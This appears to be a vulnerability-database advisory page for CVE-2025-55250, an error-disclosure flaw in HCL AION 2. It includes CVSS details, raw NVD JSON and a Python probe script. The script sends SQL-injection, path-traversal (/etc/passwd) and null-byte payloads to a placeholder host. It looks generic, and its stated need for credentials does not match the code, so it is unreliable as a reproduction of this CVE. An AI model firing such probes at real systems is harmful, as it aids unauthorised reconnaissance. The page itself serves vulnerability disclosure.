Security Vulnerability Report
中文
CVE-2025-55250 CVSS 1.8 LOW

CVE-2025-55250

Published: 2026-01-19 19:16:03
Last Modified: 2026-04-25 18:04:45

Description

HCL AION version 2 is affected by a Technical Error Disclosure vulnerability. This can expose sensitive technical details, potentially resulting in information disclosure or aiding further attacks.

CVSS Details

CVSS Score
1.8
Severity
LOW
CVSS Vector
CVSS:3.1/AV:L/AC:H/PR:H/UI:R/S:U/C:N/I:N/A:L

Configurations (Affected Products)

cpe:2.3:a:hcltech:aion:2.0.0:*:*:*:*:*:*:* - VULNERABLE
HCL AION version 2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-55250 PoC - HCL AION Technical Error Disclosure # This PoC demonstrates how to trigger error disclosure in HCL AION v2 # Note: Requires local access and valid credentials import requests import sys TARGET_URL = "http://target-host:port/aion" def exploit_technical_error_disclosure(): """ Trigger technical error disclosure in HCL AION version 2 by sending malformed requests to various endpoints """ print("[*] CVE-2025-55250 - HCL AION Technical Error Disclosure PoC") print(f"[*] Target: {TARGET_URL}") # Test payloads to trigger error disclosure payloads = [ "/api/v2/invalid-endpoint", "/api/v2/config?param=%00", "/api/v2/search?q=' OR 1=1--", "/api/v2/user/%00", "/api/v2/system/status../../etc/passwd", ] for payload in payloads: try: url = TARGET_URL + payload response = requests.get(url, timeout=10) # Check for error disclosure indicators error_indicators = [ "stack trace", "exception", "at line", "java.lang", "at com.hcl", "at org.springframework", "nested exception", "root cause", "class path", "file:", "directory:", "configuration" ] response_text = response.text.lower() for indicator in error_indicators: if indicator.lower() in response_text: print(f"[!] Potential information disclosure found with payload: {payload}") print(f"[!] Error indicator: {indicator}") print(f"[+] Response status: {response.status_code}") return True except requests.exceptions.RequestException as e: print(f"[-] Request failed: {e}") continue print("[*] No obvious error disclosure detected") return False if __name__ == "__main__": exploit_technical_error_disclosure()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-55250", "sourceIdentifier": "[email protected]", "published": "2026-01-19T19:16:02.717", "lastModified": "2026-04-25T18:04:45.020", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "HCL AION version 2 is affected by a Technical Error Disclosure vulnerability. This can expose sensitive technical details, potentially resulting in information disclosure or aiding further attacks."}, {"lang": "es", "value": "HCL AION versión 2 está afectado por una vulnerabilidad de revelación de errores técnicos. Esto puede exponer detalles técnicos sensibles, lo que podría resultar en revelación de información o facilitar ataques adicionales."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:H/PR:H/UI:R/S:U/C:N/I:N/A:L", "baseScore": 1.8, "baseSeverity": "LOW", "attackVector": "LOCAL", "attackComplexity": "HIGH", "privilegesRequired": "HIGH", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 0.3, "impactScore": 1.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-209"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:hcltech:aion:2.0.0:*:*:*:*:*:*:*", "matchCriteriaId": "BEBB7E38-04AE-436B-8F21-65FF3CA3CECC"}]}]}], "references": [{"url": "https://support.hcl-software.com/kb_view.do?sys_kb_id=4b92474633de7ad4159a05273e5c7b4b&searchTerm=kb0127995#", "source": "[email protected]", "tags": ["Permissions Required"]}]}}